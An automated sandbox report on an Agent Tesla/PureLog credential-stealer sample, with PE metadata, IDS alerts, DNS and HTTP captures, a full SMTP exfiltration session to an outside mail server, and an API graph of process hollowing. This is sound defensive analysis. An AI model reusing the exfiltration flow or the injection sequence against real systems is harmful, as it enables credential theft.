                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000xae5000xae800ed5451a22624ab362104aaabbe96ab18False0.9530914219197708data7.9668276845634205IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xb20000x10080x1800f728b346278cb9e52ce4901b3ac6691cFalse0.54150390625data5.084322080511218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xb40000xc0x8005f4df0bc6c64248bec7632bb1d2ddc35False0.015625data0.024299385236084957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xb20c80xc08PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9308441558441558
                                                              RT_GROUP_ICON0xb2ce00x14data1.05
                                                              RT_VERSION0xb2d040x300MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"0.44140625
                                                              DLLImport
                                                              mscoree.dll_CorExeMain
                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              04/25/24-07:17:01.018869TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49735587192.168.2.4192.185.35.67
                                                              04/25/24-07:17:01.018819TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49735587192.168.2.4192.185.35.67
                                                              04/25/24-07:17:01.018869TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49735587192.168.2.4192.185.35.67
                                                              04/25/24-07:17:01.018869TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49735587192.168.2.4192.185.35.67
                                                              04/25/24-07:17:01.018869TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249735587192.168.2.4192.185.35.67
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 25, 2024 07:16:58.406236887 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.406316996 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.406405926 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.413974047 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.414010048 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.651726007 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.651796103 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.670030117 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.670068026 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.671001911 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.717256069 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.730763912 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.772151947 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.934437990 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.934509993 CEST44349732104.26.12.205192.168.2.4
                                                              Apr 25, 2024 07:16:58.934562922 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:58.940745115 CEST49732443192.168.2.4104.26.12.205
                                                              Apr 25, 2024 07:16:59.057234049 CEST4973480192.168.2.4208.95.112.1
                                                              Apr 25, 2024 07:16:59.178817034 CEST8049734208.95.112.1192.168.2.4
                                                              Apr 25, 2024 07:16:59.178916931 CEST4973480192.168.2.4208.95.112.1
                                                              Apr 25, 2024 07:16:59.179042101 CEST4973480192.168.2.4208.95.112.1
                                                              Apr 25, 2024 07:16:59.302318096 CEST8049734208.95.112.1192.168.2.4
                                                              Apr 25, 2024 07:16:59.357919931 CEST4973480192.168.2.4208.95.112.1
                                                              Apr 25, 2024 07:16:59.737937927 CEST4973480192.168.2.4208.95.112.1
                                                              Apr 25, 2024 07:16:59.859657049 CEST8049734208.95.112.1192.168.2.4
                                                              Apr 25, 2024 07:16:59.863126040 CEST4973480192.168.2.4208.95.112.1
                                                              Apr 25, 2024 07:16:59.877578974 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:16:59.987449884 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:16:59.991141081 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:00.223396063 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.223627090 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:00.334290981 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.335320950 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:00.448756933 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.449084997 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:00.599716902 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.659002066 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.659195900 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:00.769047976 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.769064903 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.769201994 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:00.908168077 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:00.908380985 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:01.018264055 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:01.018347025 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:01.018819094 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:01.018868923 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:01.018901110 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:01.018920898 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:17:01.129340887 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:01.130444050 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:17:01.170411110 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:18:39.764529943 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:18:39.914735079 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:18:40.076050043 CEST58749735192.185.35.67192.168.2.4
                                                              Apr 25, 2024 07:18:40.076189995 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:18:40.076190948 CEST49735587192.168.2.4192.185.35.67
                                                              Apr 25, 2024 07:18:40.186196089 CEST58749735192.185.35.67192.168.2.4
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Apr 25, 2024 07:16:58.291160107 CEST6247953192.168.2.41.1.1.1
                                                              Apr 25, 2024 07:16:58.401407003 CEST53624791.1.1.1192.168.2.4
                                                              Apr 25, 2024 07:16:58.945625067 CEST5891553192.168.2.41.1.1.1
                                                              Apr 25, 2024 07:16:59.056652069 CEST53589151.1.1.1192.168.2.4
                                                              Apr 25, 2024 07:16:59.738641024 CEST5371053192.168.2.41.1.1.1
                                                              Apr 25, 2024 07:16:59.876885891 CEST53537101.1.1.1192.168.2.4
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Apr 25, 2024 07:16:58.291160107 CEST192.168.2.41.1.1.10xc2f0Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                              Apr 25, 2024 07:16:58.945625067 CEST192.168.2.41.1.1.10x8656Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                              Apr 25, 2024 07:16:59.738641024 CEST192.168.2.41.1.1.10x5bd8Standard query (0)mail.nationalkham.comA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Apr 25, 2024 07:16:58.401407003 CEST1.1.1.1192.168.2.40xc2f0No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                              Apr 25, 2024 07:16:58.401407003 CEST1.1.1.1192.168.2.40xc2f0No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                              Apr 25, 2024 07:16:58.401407003 CEST1.1.1.1192.168.2.40xc2f0No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                              Apr 25, 2024 07:16:59.056652069 CEST1.1.1.1192.168.2.40x8656No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                              Apr 25, 2024 07:16:59.876885891 CEST1.1.1.1192.168.2.40x5bd8No error (0)mail.nationalkham.com192.185.35.67A (IP address)IN (0x0001)false
                                                              • api.ipify.org
                                                              • ip-api.com
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449734208.95.112.1807404C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              TimestampBytes transferredDirectionData
                                                              Apr 25, 2024 07:16:59.179042101 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                              Host: ip-api.com
                                                              Connection: Keep-Alive
                                                              Apr 25, 2024 07:16:59.302318096 CEST174INHTTP/1.1 200 OK
                                                              Date: Thu, 25 Apr 2024 05:16:58 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Content-Length: 5
                                                              Access-Control-Allow-Origin: *
                                                              X-Ttl: 60
                                                              X-Rl: 44
                                                              Data Raw: 74 72 75 65 0a
                                                              Data Ascii: true


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449732104.26.12.2054437404C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-04-25 05:16:58 UTC155OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                              Host: api.ipify.org
                                                              Connection: Keep-Alive
                                                              2024-04-25 05:16:58 UTC211INHTTP/1.1 200 OK
                                                              Date: Thu, 25 Apr 2024 05:16:58 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 14
                                                              Connection: close
                                                              Vary: Origin
                                                              CF-Cache-Status: DYNAMIC
                                                              Server: cloudflare
                                                              CF-RAY: 879bdd33cfda674c-ATL
                                                              2024-04-25 05:16:58 UTC14INData Raw: 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30
                                                              Data Ascii: 185.152.66.230


                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                              Apr 25, 2024 07:17:00.223396063 CEST58749735192.185.35.67192.168.2.4220-gator4087.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 25 Apr 2024 00:17:00 -0500
                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                              220 and/or bulk e-mail.
                                                              Apr 25, 2024 07:17:00.223627090 CEST49735587192.168.2.4192.185.35.67EHLO 134349
                                                              Apr 25, 2024 07:17:00.334290981 CEST58749735192.185.35.67192.168.2.4250-gator4087.hostgator.com Hello 134349 [185.152.66.230]
                                                              250-SIZE 52428800
                                                              250-8BITMIME
                                                              250-PIPELINING
                                                              250-PIPECONNECT
                                                              250-AUTH PLAIN LOGIN
                                                              250-STARTTLS
                                                              250 HELP
                                                              Apr 25, 2024 07:17:00.335320950 CEST49735587192.168.2.4192.185.35.67AUTH login c2FsZXNAbmF0aW9uYWxraGFtLmNvbQ==
                                                              Apr 25, 2024 07:17:00.448756933 CEST58749735192.185.35.67192.168.2.4334 UGFzc3dvcmQ6
                                                              Apr 25, 2024 07:17:00.659002066 CEST58749735192.185.35.67192.168.2.4235 Authentication succeeded
                                                              Apr 25, 2024 07:17:00.659195900 CEST49735587192.168.2.4192.185.35.67MAIL FROM:<sales@nationalkham.com>
                                                              Apr 25, 2024 07:17:00.769064903 CEST58749735192.185.35.67192.168.2.4250 OK
                                                              Apr 25, 2024 07:17:00.769201994 CEST49735587192.168.2.4192.185.35.67RCPT TO:<newmankint@yandex.com>
                                                              Apr 25, 2024 07:17:00.908168077 CEST58749735192.185.35.67192.168.2.4250 Accepted
                                                              Apr 25, 2024 07:17:00.908380985 CEST49735587192.168.2.4192.185.35.67DATA
                                                              Apr 25, 2024 07:17:01.018347025 CEST58749735192.185.35.67192.168.2.4354 Enter message, ending with "." on a line by itself
                                                              Apr 25, 2024 07:17:01.018920898 CEST49735587192.168.2.4192.185.35.67.
                                                              Apr 25, 2024 07:17:01.130444050 CEST58749735192.185.35.67192.168.2.4250 OK id=1rzrTg-0028h6-36
                                                              Apr 25, 2024 07:18:39.764529943 CEST49735587192.168.2.4192.185.35.67QUIT
                                                              Apr 25, 2024 07:18:40.076050043 CEST58749735192.185.35.67192.168.2.4221 gator4087.hostgator.com closing connection

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:07:16:55
                                                              Start date:25/04/2024
                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe"
                                                              Imagebase:0xdc0000
                                                              File size:724'992 bytes
                                                              MD5 hash:946A0735432ACA25FA370970E97A3DBB
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:07:16:56
                                                              Start date:25/04/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                              Imagebase:0x670000
                                                              File size:45'984 bytes
                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:high
                                                              Has exited:false

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:10.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:155
                                                                Total number of Limit Nodes:12
                                                                execution_graph 38083 17dd7f8 38084 17dd83e GetCurrentProcess 38083->38084 38086 17dd890 GetCurrentThread 38084->38086 38090 17dd889 38084->38090 38087 17dd8cd GetCurrentProcess 38086->38087 38088 17dd8c6 38086->38088 38089 17dd903 GetCurrentThreadId 38087->38089 38088->38087 38092 17dd95c 38089->38092 38090->38086 38093 17db478 38096 17db55f 38093->38096 38094 17db487 38097 17db581 38096->38097 38099 17db5a4 38096->38099 38097->38099 38104 17db7f8 38097->38104 38108 17db808 38097->38108 38098 17db59c 38098->38099 38100 17db7a8 GetModuleHandleW 38098->38100 38099->38094 38101 17db7d5 38100->38101 38101->38094 38106 17db808 38104->38106 38105 17db841 38105->38098 38106->38105 38112 17dafb0 38106->38112 38109 17db81c 38108->38109 38110 17dafb0 LoadLibraryExW 38109->38110 38111 17db841 38109->38111 38110->38111 38111->38098 38113 17db9e8 LoadLibraryExW 38112->38113 38115 17dba61 38113->38115 38115->38105 38116 17d4668 38117 17d4669 38116->38117 38118 17d4686 38117->38118 38120 17d4778 38117->38120 38121 17d479d 38120->38121 38125 17d4879 38121->38125 38129 17d4888 38121->38129 38127 17d4888 38125->38127 38126 17d498c 38127->38126 38133 17d44e4 38127->38133 38131 17d48af 38129->38131 38130 17d498c 38130->38130 38131->38130 38132 17d44e4 CreateActCtxA 38131->38132 38132->38130 38134 17d5918 CreateActCtxA 38133->38134 38136 17d59db 38134->38136 38137 7b5d7de 38142 7b5e23f 38137->38142 38155 7b5e248 38137->38155 38168 7b5e2ae 38137->38168 38138 7b5d801 38143 7b5e262 38142->38143 38144 7b5e26a 38143->38144 38182 7b5e805 38143->38182 38186 7b5edab 38143->38186 38193 7b5e91e 38143->38193 38200 7b5e83f 38143->38200 38204 7b5e75d 38143->38204 38208 7b5e962 38143->38208 38213 7b5ebf0 38143->38213 38218 7b5ea90 38143->38218 38222 7b5ea61 38143->38222 38229 7b5eaf4 38143->38229 38144->38138 38156 7b5e262 38155->38156 38157 7b5e26a 38156->38157 38158 7b5e805 2 API calls 38156->38158 38159 7b5eaf4 2 API calls 38156->38159 38160 7b5ea61 4 API calls 38156->38160 38161 7b5ea90 2 API calls 38156->38161 38162 7b5ebf0 2 API calls 38156->38162 38163 7b5e962 2 API calls 38156->38163 38164 7b5e75d 2 API calls 38156->38164 38165 7b5e83f 2 API calls 38156->38165 38166 7b5e91e 4 API calls 38156->38166 38167 7b5edab 4 API calls 38156->38167 38157->38138 38158->38157 38159->38157 38160->38157 38161->38157 38162->38157 38163->38157 38164->38157 38165->38157 38166->38157 38167->38157 38169 7b5e2b1 38168->38169 38170 7b5e23c 38168->38170 38169->38138 38171 7b5e26a 38170->38171 38172 7b5e805 2 API calls 38170->38172 38173 7b5eaf4 2 API calls 38170->38173 38174 7b5ea61 4 API calls 38170->38174 38175 7b5ea90 2 API calls 38170->38175 38176 7b5ebf0 2 API calls 38170->38176 38177 7b5e962 2 API calls 38170->38177 38178 7b5e75d 2 API calls 38170->38178 38179 7b5e83f 2 API calls 38170->38179 38180 7b5e91e 4 API calls 38170->38180 38181 7b5edab 4 API calls 38170->38181 38171->38138 38172->38171 38173->38171 38174->38171 38175->38171 38176->38171 38177->38171 38178->38171 38179->38171 38180->38171 38181->38171 38233 7b5cf90 38182->38233 38237 7b5cf88 38182->38237 38183 7b5e81f 38183->38144 38187 7b5eb34 38186->38187 38188 7b5f158 38187->38188 38191 7b5cf90 Wow64SetThreadContext 38187->38191 38192 7b5cf88 Wow64SetThreadContext 38187->38192 38241 7b5ced9 38187->38241 38245 7b5cee0 38187->38245 38188->38144 38191->38187 38192->38187 38194 7b5e933 38193->38194 38195 7b5f158 38194->38195 38196 7b5cf90 Wow64SetThreadContext 38194->38196 38197 7b5cf88 Wow64SetThreadContext 38194->38197 38198 7b5cee0 ResumeThread 38194->38198 38199 7b5ced9 ResumeThread 38194->38199 38195->38144 38196->38194 38197->38194 38198->38194 38199->38194 38249 7b5d120 38200->38249 38253 7b5d128 38200->38253 38201 7b5e86d 38201->38144 38257 7b5d3b0 38204->38257 38261 7b5d3a9 38204->38261 38209 7b5e968 38208->38209 38211 7b5d120 WriteProcessMemory 38209->38211 38212 7b5d128 WriteProcessMemory 38209->38212 38210 7b5eb98 38210->38144 38211->38210 38212->38210 38215 7b5ec05 38213->38215 38214 7b5f12c 38216 7b5d120 WriteProcessMemory 38215->38216 38217 7b5d128 WriteProcessMemory 38215->38217 38216->38214 38217->38214 38265 7b5d211 38218->38265 38269 7b5d218 38218->38269 38219 7b5e8a3 38219->38144 38224 7b5ea7c 38222->38224 38223 7b5f158 38223->38144 38224->38223 38225 7b5cee0 ResumeThread 38224->38225 38226 7b5ced9 ResumeThread 38224->38226 38227 7b5cf90 Wow64SetThreadContext 38224->38227 38228 7b5cf88 Wow64SetThreadContext 38224->38228 38225->38224 38226->38224 38227->38224 38228->38224 38273 7b5d061 38229->38273 38277 7b5d068 38229->38277 38230 7b5eb15 38234 7b5cfd5 Wow64SetThreadContext 38233->38234 38236 7b5d01d 38234->38236 38236->38183 38238 7b5cfd5 Wow64SetThreadContext 38237->38238 38240 7b5d01d 38238->38240 38240->38183 38242 7b5cf20 ResumeThread 38241->38242 38244 7b5cf51 38242->38244 38244->38187 38246 7b5cf20 ResumeThread 38245->38246 38248 7b5cf51 38246->38248 38248->38187 38250 7b5d170 WriteProcessMemory 38249->38250 38252 7b5d1c7 38250->38252 38252->38201 38254 7b5d170 WriteProcessMemory 38253->38254 38256 7b5d1c7 38254->38256 38256->38201 38258 7b5d439 CreateProcessA 38257->38258 38260 7b5d5fb 38258->38260 38262 7b5d439 CreateProcessA 38261->38262 38264 7b5d5fb 38262->38264 38266 7b5d263 ReadProcessMemory 38265->38266 38268 7b5d2a7 38266->38268 38268->38219 38270 7b5d263 ReadProcessMemory 38269->38270 38272 7b5d2a7 38270->38272 38272->38219 38274 7b5d0a8 VirtualAllocEx 38273->38274 38276 7b5d0e5 38274->38276 38276->38230 38278 7b5d0a8 VirtualAllocEx 38277->38278 38280 7b5d0e5 38278->38280 38280->38230 38281 7b5f498 38282 7b5f623 38281->38282 38283 7b5f4be 38281->38283 38283->38282 38285 7b5b990 38283->38285 38286 7b5b997 PostMessageW 38285->38286 38288 7b5f784 38286->38288 38288->38283 38289 17dda40 DuplicateHandle 38290 17ddad6 38289->38290
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689757039.0000000007C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7c40000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 82435f2a601d853b4eed8785bda5f48d19943075ce86fd65b92435a01075a387
                                                                • Instruction ID: 4ee67b16de6d75515d6d2e1595fc078874bc8f75192960da83c831b2980e1794
                                                                • Opcode Fuzzy Hash: 82435f2a601d853b4eed8785bda5f48d19943075ce86fd65b92435a01075a387
                                                                • Instruction Fuzzy Hash: 42C1EDB1740B068FDB29EB75C450B6EB7F6AF89700F1444ADD2468B394DB34EA82CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d50ae5587e49206585afec7eeb68113e6c6a9e4e46d60a967858b15e6298d0e2
                                                                • Instruction ID: 66cc244b4421096d6f33e97e01476d2f02fea036e912c425470359475d5be4e2
                                                                • Opcode Fuzzy Hash: d50ae5587e49206585afec7eeb68113e6c6a9e4e46d60a967858b15e6298d0e2
                                                                • Instruction Fuzzy Hash: BC513AB0E1520A9FEB04DFAAD8556AEBBF2EF89310F14946AE811A7354D7345A018F90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1689603500.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f0721746ae7a5e285c584c1b78814f992639aa67722abf06c07922c7839aff0
                                                                • Instruction ID: 4023e2843c5b65994d892b24da71d294dc078f7bb248099ea010940cc9a1910c
                                                                • Opcode Fuzzy Hash: 9f0721746ae7a5e285c584c1b78814f992639aa67722abf06c07922c7839aff0
                                                                • Instruction Fuzzy Hash: 2C5138B0E1520A8FEB04DFAAD8556AEBBF2EF89310F14942AE815A7354D7345A018F90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 297 17dd7f8-17dd887 GetCurrentProcess 301 17dd889-17dd88f 297->301 302 17dd890-17dd8c4 GetCurrentThread 297->302 301->302 303 17dd8cd-17dd901 GetCurrentProcess 302->303 304 17dd8c6-17dd8cc 302->304 305 17dd90a-17dd922 303->305 306 17dd903-17dd909 303->306 304->303 310 17dd92b-17dd95a GetCurrentThreadId 305->310 306->305 311 17dd95c-17dd962 310->311 312 17dd963-17dd9c5 310->312 311->312
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 017DD876
                                                                • GetCurrentThread.KERNEL32 ref: 017DD8B3
                                                                • GetCurrentProcess.KERNEL32 ref: 017DD8F0
                                                                • GetCurrentThreadId.KERNEL32 ref: 017DD949
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1684997542.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_17d0000_SecuriteInfo.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID: g.D
                                                                • API String ID: 2063062207-477188214
                                                                • Opcode ID: 263041ab5da437d2c6c7a666b0c80e16a05b4be09a079aae388c06642a1148c9
                                                                • Instruction ID: 10b8ca331062f1b1d32087f60aeac3f235285178da3dffee28bda3e4f02f26a1
                                                                • Opcode Fuzzy Hash: 263041ab5da437d2c6c7a666b0c80e16a05b4be09a079aae388c06642a1148c9
                                                                • Instruction Fuzzy Hash: 145126B09007498FDB14DFA9D548B9EFBF1EB88314F20C069E059A73A5DB349984CF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 318 7b5d3a9-7b5d445 320 7b5d447-7b5d451 318->320 321 7b5d47e-7b5d49e 318->321 320->321 322 7b5d453-7b5d455 320->322 326 7b5d4d7-7b5d506 321->326 327 7b5d4a0-7b5d4aa 321->327 323 7b5d457-7b5d461 322->323 324 7b5d478-7b5d47b 322->324 328 7b5d465-7b5d474 323->328 329 7b5d463 323->329 324->321 337 7b5d53f-7b5d5f9 CreateProcessA 326->337 338 7b5d508-7b5d512 326->338 327->326 330 7b5d4ac-7b5d4ae 327->330 328->328 331 7b5d476 328->331 329->328 332 7b5d4d1-7b5d4d4 330->332 333 7b5d4b0-7b5d4ba 330->333 331->324 332->326 335 7b5d4bc 333->335 336 7b5d4be-7b5d4cd 333->336 335->336 336->336 339 7b5d4cf 336->339 349 7b5d602-7b5d688 337->349 350 7b5d5fb-7b5d601 337->350 338->337 340 7b5d514-7b5d516 338->340 339->332 342 7b5d539-7b5d53c 340->342 343 7b5d518-7b5d522 340->343 342->337 344 7b5d524 343->344 345 7b5d526-7b5d535 343->345 344->345 345->345 347 7b5d537 345->347 347->342 360 7b5d698-7b5d69c 349->360 361 7b5d68a-7b5d68e 349->361 350->349 363 7b5d6ac-7b5d6b0 360->363 364 7b5d69e-7b5d6a2 360->364 361->360 362 7b5d690 361->362 362->360 366 7b5d6c0-7b5d6c4 363->366 367 7b5d6b2-7b5d6b6 363->367 364->363 365 7b5d6a4 364->365 365->363 369 7b5d6d6-7b5d6dd 366->369 370 7b5d6c6-7b5d6cc 366->370 367->366 368 7b5d6b8 367->368 368->366 371 7b5d6f4 369->371 372 7b5d6df-7b5d6ee 369->372 370->369 374 7b5d6f5 371->374 372->371 374->374
                                                                APIs
